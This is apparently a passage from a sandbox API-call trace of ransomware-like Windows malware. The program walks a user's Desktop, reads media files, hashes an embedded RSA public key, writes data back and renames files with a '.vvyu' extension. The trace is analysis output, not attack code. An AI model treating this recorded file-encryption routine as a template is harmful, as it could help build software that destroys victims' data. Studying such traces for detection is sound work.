(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.484] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.484] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.484] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.484] CloseHandle (hObject=0x584) returned 1 [0183.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0183.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d36670 [0183.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.487] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\C5Rx.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\c5rx.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\C5Rx.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\c5rx.mkv.vvyu")) returned 1 [0183.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.496] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.499] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0183.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d90 [0183.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0183.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30d90 | out: hHeap=0x6a0000) returned 1 [0183.500] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini") returned=".ini" [0183.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.500] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ebb49d0, ftCreationTime.dwHighDateTime=0x1d89de3, ftLastAccessTime.dwLowDateTime=0x690ae0d0, ftLastAccessTime.dwHighDateTime=0x1d8a29f, ftLastWriteTime.dwLowDateTime=0x690ae0d0, ftLastWriteTime.dwHighDateTime=0x1d8a29f, nFileSizeHigh=0x0, nFileSizeLow=0x5b88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dyhqUG0jR8D4ISRX0Nn1.flv", cAlternateFileName="DYHQUG~1.FLV")) returned 1 [0183.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d90 [0183.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0183.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30d90 | out: hHeap=0x6a0000) returned 1 [0183.500] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\dyhqUG0jR8D4ISRX0Nn1.flv") returned=".flv" [0183.500] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\dyhqUG0jR8D4ISRX0Nn1.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\dyhqug0jr8d4isrx0nn1.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.501] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=23432) returned 1 [0183.501] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.503] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5b62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.503] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.506] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.506] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x5b88, lpOverlapped=0x0) returned 1 [0183.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.507] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.507] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.508] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.508] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.508] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.508] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.508] GetLastError () returned 0x0 [0183.508] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.508] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.509] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.509] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.509] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5b90) returned 0x2d36670 [0183.509] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d90 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30dd8 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.510] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d3c208 [0183.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d3c428 [0183.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3c428 | out: hHeap=0x6a0000) returned 1 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e750 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e738 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3c208 | out: hHeap=0x6a0000) returned 1 [0183.513] GetCurrentThreadId () returned 0x264 [0183.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce2f0 [0183.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.514] GetCurrentThreadId () returned 0x264 [0183.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e750 [0183.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7b0 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7c8 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e768 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e738 [0183.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3c208 [0183.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3c418 [0183.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d3c630 [0183.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3c418 | out: hHeap=0x6a0000) returned 1 [0183.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3c630 | out: hHeap=0x6a0000) returned 1 [0183.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 